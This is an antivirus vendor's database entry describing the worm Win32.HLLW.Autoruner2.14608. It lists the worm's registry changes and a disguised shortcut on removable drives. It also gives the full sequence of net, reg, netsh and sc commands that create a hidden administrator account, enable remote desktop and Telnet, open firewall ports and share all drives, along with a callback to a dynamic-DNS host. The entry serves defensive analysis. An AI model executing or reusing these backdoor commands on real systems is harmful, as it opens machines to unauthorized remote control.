Pour le fonctionnement correct du site, vous devez activer JavaScript dans votre navigateur.
Win32.HLLW.Autoruner2.14608
Added to the Dr.Web virus database:
2014-05-10
Virus description added:
2014-05-22
Technical Information
To ensure autorun and distribution:
Modifies the following registry keys:
[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'LoadOrderVerification' = '%WINDIR%\iexplorer.exe'
Creates the following services:
[<HKLM>\SYSTEM\ControlSet001\Services\TermService] 'Start' = '00000002'
[<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
[<HKLM>\SYSTEM\ControlSet001\Services\lanmanserver] 'Start' = '00000002'
Creates the following files on removable media:
<Drive name for removable media>:\Cristiano Ronaldo.jpg.lnk
Malicious functions:
To bypass firewall, removes or modifies the following registry keys:
[<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\tlntsvr.exe' = '<SYSTEM32>\tlntsvr.exe:*:Enabled:iexplorer'
[<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%WINDIR%\iexplorer.exe' = '%WINDIR%\iexplorer.exe:*:Enabled:iexplorer.exe'
Creates and executes the following:
Executes the following:
'<SYSTEM32>\netsh.exe' firewall set allowedprogram <SYSTEM32>\tlntsvr.exe iexplorer enable
'<SYSTEM32>\net1.exe' localgroup "Utilisateurs du Bureau р distance" ASPENET /add
'<SYSTEM32>\net1.exe' localgroup "Remote desktop users" ASPENET /add
'<SYSTEM32>\netsh.exe' firewall set service type = fileandprint mode = enable
'<SYSTEM32>\net1.exe' start lanmanserver
'<SYSTEM32>\sc.exe' config lanmanserver start= auto
'<SYSTEM32>\net1.exe' localgroup %USERNAME%s ASPENET /add
'<SYSTEM32>\net1.exe' share b$=b:\
'<SYSTEM32>\net1.exe' share v$=v:\
'<SYSTEM32>\net1.exe' share c$=c:\
'<SYSTEM32>\net1.exe' localgroup administrateurs ASPENET /add
'<SYSTEM32>\net1.exe' user ASPENET 159482637 /add
'<SYSTEM32>\net1.exe' share n$=n:\
'<SYSTEM32>\reg.exe' add "hklm\system\currentcontrolset\control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
'<SYSTEM32>\reg.exe' add "hklm\system\currentcontrolset\control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
'<SYSTEM32>\reg.exe' add "HKLM\software\microsoft\Windows\CurrentVersion\Run" /v LoadOrderVerification /t REG_SZ /d "%WINDIR%\iexplorer.exe" /f
'<SYSTEM32>\net1.exe' user ASPENET /active:yes
'<SYSTEM32>\netsh.exe' firewall add portopening TCP 3389 "Romet Desktop"
'<SYSTEM32>\netsh.exe' firewall add portopening TCP 3389 "Bureau р distance"
'<SYSTEM32>\net1.exe' start TermService
'<SYSTEM32>\sc.exe' start tlntsvr
'<SYSTEM32>\sc.exe' config tlntsvr start= auto
'<SYSTEM32>\reg.exe' add "hklm\system\currentControlSet\Control\Lнsa" /v "forceguest" /t REG_DWORD /d 0x0 /f
'<SYSTEM32>\sc.exe' config TermService start= auto
'<SYSTEM32>\regsvr32.exe' /s <SYSTEM32>\tlntsvrp.dll
'<SYSTEM32>\tlntsvr.exe'
'<SYSTEM32>\net1.exe' share y$=y:\
'<SYSTEM32>\net1.exe' share t$=t:\
'<SYSTEM32>\net1.exe' share r$=r:\
'<SYSTEM32>\net1.exe' share o$=o:\
'<SYSTEM32>\net1.exe' share i$=i:\
'<SYSTEM32>\net1.exe' share u$=u:\
'<SYSTEM32>\net1.exe' share e$=e:\
'<SYSTEM32>\netsh.exe' firewall set service type = remotedesktop mode = enable
'<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List" /v "%WINDIR%\iexplorer.exe" /t REG_SZ /d "%WINDIR%\iexplorer.exe:*:Enabled:iexplorer.exe" /f
'<SYSTEM32>\cmd.exe' /c %WINDIR%\ASPENET.bat
'<SYSTEM32>\net1.exe' share z$=z:\
'<SYSTEM32>\net1.exe' share a$=a:\
'<SYSTEM32>\reg.exe' add "HKLM\software\microsoft\windows NT\CurrentVersion\Winlogon\specialaccounts\UserList" /v ASPENET /t REG_DWORD /d 0 /f
'<SYSTEM32>\net1.exe' share l$=l:\
'<SYSTEM32>\net1.exe' share k$=k:\
'<SYSTEM32>\net1.exe' share j$=j:\
'<SYSTEM32>\net1.exe' share x$=x:\
'<SYSTEM32>\net1.exe' share w$=w:\
'<SYSTEM32>\net1.exe' share m$=m:\
'<SYSTEM32>\net1.exe' share h$=h:\
'<SYSTEM32>\net1.exe' share s$=s:\
'<SYSTEM32>\net1.exe' share q$=q:\
'<SYSTEM32>\net1.exe' share p$=p:\
'<SYSTEM32>\net1.exe' share g$=g:\
'<SYSTEM32>\net1.exe' share f$=f:\
'<SYSTEM32>\net1.exe' share d$=<Drive name for removable media>:\
Modifies file system :
Creates the following files:
%WINDIR%\ASPENET.bat
<Current directory>\SchedLgUt.Txt
%WINDIR%\iexplorer.exe
%WINDIR%\Grpvinc.cpe
Network activity:
Connects to:
'any':58008
'py####a.no-ip.biz':58008
UDP:
DNS ASK py####a.no-ip.biz
Miscellaneous:
Searches for the following windows:
ClassName: '#32770' WindowName: 'Gestionnaire des t?ches de Windows'
ClassName: '#32770' WindowName: '(null)'
ClassName: 'SysListView32' WindowName: 'processus'
ClassName: 'TApplication' WindowName: '<Virus name>'
ClassName: 'MS_WINHELP' WindowName: '(null)'
ClassName: 'TApplication' WindowName: 'iexplorer'
Téléchargez Dr.Web pour Android
Gratuit pour 3 mois
Tous les composants de protection
Renouvellement de la démo via AppGallery/Google Pay
Nous utilisons des cookies sur notre site web à des fins d’analyse et de récolte de données statistiques. En naviguant sur notre site, vous pouvez accepter ou refuser l’utilisation de ces fichiers cookies, sauf ceux strictement nécessaires au fonctionnement du site web.
En savoir plus : Politique de confidentialité
Accepter
Refuser